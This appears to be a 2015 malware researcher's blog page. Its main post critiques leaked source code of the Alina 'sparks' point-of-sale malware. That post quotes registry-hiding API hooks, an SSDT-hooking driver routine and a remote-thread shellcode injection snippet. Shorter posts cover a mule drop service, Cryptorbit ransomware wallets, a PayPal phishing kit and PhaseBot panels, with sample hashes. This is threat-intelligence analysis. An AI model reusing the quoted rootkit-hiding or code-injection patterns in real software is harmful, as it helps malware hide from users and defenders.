Thursday, 15 January 2015

Alina 'sparks' source code review

I got on my hands recently the source code of Alina "sparks", the main 'improvement' that everyone is talking about and make the price of this malware rise is the rootkit feature.
Josh Grunzweig did already an interesting coverage of a sample, but what worth this new version ?

InjectedDLL.c from the source is a Chinese copy-paste of http://www.cnblogs.com/lzjsky/archive/2010/12/01/1892702.html and commented out, replaced with two kernel32 hooks instead, like if the author cannot into hooks :D
a comment is still in Chinese as you can see on the screenshot.

+ this:
LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName,LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
{
LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0)
{
Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
}
return Result;
}

...

// Registry Value Hiding
Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &RegEnumValueANext);
Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &RegEnumValueWNext);
So many stupid mistakes in the code, no sanity checks in hooks, nothing stable.
Haven't looked at a sample in the wild but i doubt it work anyhow.
Actual rootkit source (body stored as hex array in RootkitDriver.inc c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap.

This x86-32 driver is responsible for NtQuerySystemInformation, NtEnumerateValueKey, NtQueryDirectoryFile SSDT hooking.
Driver is ridiculously simple:
NTSTATUS NTAPI DrvMain(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
  DriverObject->DriverUnload = (PDRIVER_UNLOAD)UnloadProc;
  BuildMdlForSSDT();
  InitStrings();
  SetHooks();
  return STATUS_SUCCESS;
}

BOOL SetHooks()
{
  if ( !NtQuerySystemInformationOrig )
    NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook);
  if ( !NtEnumerateValueKeyOrig )
    NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook);
  if ( !NtQueryDirectoryFileOrig )
    NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook);
  return TRUE;
}

All of them hide 'windefender' target process, file, registry.
void InitStrings()
{
  RtlInitUnicodeString((PUNICODE_STRING)&WindefenderProcessString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderFileString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderRegistryString, L"windefender");
}
It's the malware name, Josh pointed also in this direction on his analysis.
First submitted on VT the 2013-10-17 17:27:10 UTC ( 1 year, 2 months ago )
https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/

Overall that dll seems unusued, alina project uses driver i mentioned.
As for project itself, it's still an awful piece of students lab work, here is some log just from attempt to compile:
source\grab\base.cpp(78)
If SHGetSpecialFolderPath returns FALSE, strcat to SourceFilePath will be used anyway.

Two copy-pasted methods with same mistake:
source\grab\base.cpp(298)
source\grab\base.cpp(433)
Leaking process information handle pi.hProcess.

Using hKey from failed function call:
source\grab\base.cpp(316):
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L,  KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) {
      RegCloseKey(hKey);

pThread could be NULL, this is checked only in WriteProcessMemory but not in CreateRemoteThread:
source\grab\monitoringthread.cpp(110):
LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pThread != NULL) WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &BytesWritten);
HANDLE ThreadHandle =  CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &TID);

Where hwid declared as char hwid[8];
Reading invalid data from hdr->hwid: the readable size is 8 bytes, but 18 bytes may be read:
source\grab\panelrequest.cpp(73):
memcpy(outkey, hdr->hwid, 18);

Realloc might return null pointer: assigning null pointer to buf, which is passed as an argument to realloc, will cause the original memory block to be leaked:
source\grab\panelrequest.cpp(173)

The prior call to strncpy might not zero-terminate string Result:
source\grab\scanner.cpp(159)

Return value of ReadFile ignored. If it will fail anywhere code will be corrupted as cmd variable is not initialized:
source\grab\watcher.cpp(61)
source\grab\watcher.cpp(64)
source\grab\watcher.cpp(71)

Signed unsigned mismatch:
source\grab\rootkitinstaller.cpp(47)

Unreferenced local variable hResult:
source\grab\base.cpp(158)

Using TerminateThread does not allow proper thread clean up:
source\grab\watcher.cpp(125)

Now related to 'editions' sparks have some, for examples the pipes, mutexes, user-agents, process black-list but most of these editions are minors things that anybody can do to 'customise' his own bot.
In any case that can count as a code addition or something 'new'
For the panel... well it's like the bot, nothing changed at all.
It's still the same ugly design, still the same files with same modifications timestamp, no code addition, still the same cookie auth crap like if the coder can't use session in php and so on...

To conclude, the main improvement is a copy/pasted rootkit who don't work, i don't know how many bad guys bought this source for 1k or more but that definitely not worth it.
Overall it's a good example of how people can take a code, announce a rootkit to impress and play everything on malware notoriety.
This remind me the guys who announced IceIX on malware forums and finally the samples was just a basic ZeuS with broken improvements.

Hi Benson.

Wednesday, 14 January 2015

Tiberium/Consuella USPS money laundering service


Consuella was a 'USPS drop service' run by one of the Lampeduza administrator.
This type of service is used to help credit card thieves to "cash out" by sending carded labels service overseas (or not) via USPS.
They was also constantly recruiting mules in United states to keep addresses in rotation.


Here is what look like the service from an admin point of view:


Add a payement:

Users:
Supports:

News:

Settings:

Although Consuella was incredibly simple compared to others drop-shipping service such as addtrack.biz and pac-man.co who had fake website for mules on the panel.

Tuesday, 13 January 2015

Cryptorbit locker

When Cryptorbit ransomware was targeting people i've visited them

SQL database:

Bad guy wallets:
1H6jc6Mz535zTts6DWdeJf3HdH4owGjsXo
15JTKDkU4U6Tn5MBc9Pt52mMzXDmvmaanR
18yP3oKzeqChWCYG2ZGPcBhMQBiXFeR2GF
17FSkXDULjtK6R9G3cpwmLMYbWRZJ9c8vZ
1KZvxpPzvkSCqm3VTffWBWcLumWK1KJfkK

Pseudo decryptor ~ 4a8e11468649e045976574691cf53732

Captain Barbarossa

Captain Barbarossa, is used for Paypal phishing and sold as phishing kit, the kit include an admin panel.
User is tricked with a fake Paypal login asking for details, here in German:



Once infos are transmitted the datas are sent to the panel.
Login:

Main:

Log manager:

Monday, 12 January 2015

Phase (Win32/PhaseBot-A)

Small write-up about 'Phase' a malware who appeared and vanished very rapidly.
I had a look on it with MalwareTech who wrote several stories, it was shown that Phase is in reality a 'new' version of Solar bot, at least not so new, the code is so copy/pasted that even Antivirus such as Avast do false positives and now detect Napolar (Solar) as PhaseBot.

Advert:

Phase support website:

The coder is using public snippet for chatting with customers:
So weak that this is even vulnerable to xss.

Master balance ? less than < 1k
Phase seem not so popular, and got also rapidly lynched by other actors on forums.

Anyway let's have a look on the web panel.
Login:

Dashboard:

Commands:

Botlist:

Credentials:

Socks5:

Browsers:

Modules:

Analyzer detector:

RDP:

Settings:

FAQ:

Structure:

In the wild panel, having Ram scrapper plugin + VNC:

Ram scrapper plugin:

Point-of-sale remote controlled:

Another botnet with hacked point of sale remote controlled:

Wallet stealer:

Phase samples:
ae7a56b3adf6f7684ba14a77c017904d
12dccdec47928e5298055996415a94f2
d1446326bf1c69ea9df6e65bd472f358
1f3e808a3ccd981f3e61de227dae93b8
6ce0bb4cd86295f915160d7207a07a47
5767b9bf9cb6f2b5259f29dd8b873e36
a10f84153dba7b73980f0ff50d8cc8e6
f8ffcab3324561598ce5c375c07066be
e4574fbc1014d27e1b6906bfc5351e0e
d2ed20b1996e7e5bad2b91fd255732ef
f89b4e626c7a81544ca7395be3262cf6
ef69575e14fa965380242db26675d2df
fc586c3ec37e51668e905d0acfc913f6
eb9b56d829c3951b6e9cb5e4a651f7c8
6f53d3cd1acb7541bcc7399c4af001b1
19fa3927577571c51428f6eee2b5f52f
4ec84f1aa91e4cdc12118002244ca582
20e3a9ec396ad8b57a36ea3c6b9f151a
fe5dfa53204a65eca741ceab352c3b00
ace0a059dc2264c847d4e6c91f829dfd
f01c1ea73e968c2309391dcf3f0a2848

Unencrypted Ram scrapper plugin: 1e18ee52d6f0322d065b07ec7bfcbbe8
Unencrypted VNC plugin: 94eefdce643a084f95dd4c91289c3cf0
Panel: c43933e7c8b9d4c95703f798b515b384 (With a small trendMicro signature fail "PHP_SORAYA.A" no this is not the Soraya panel.
Needless to say the panel was also vulnerable.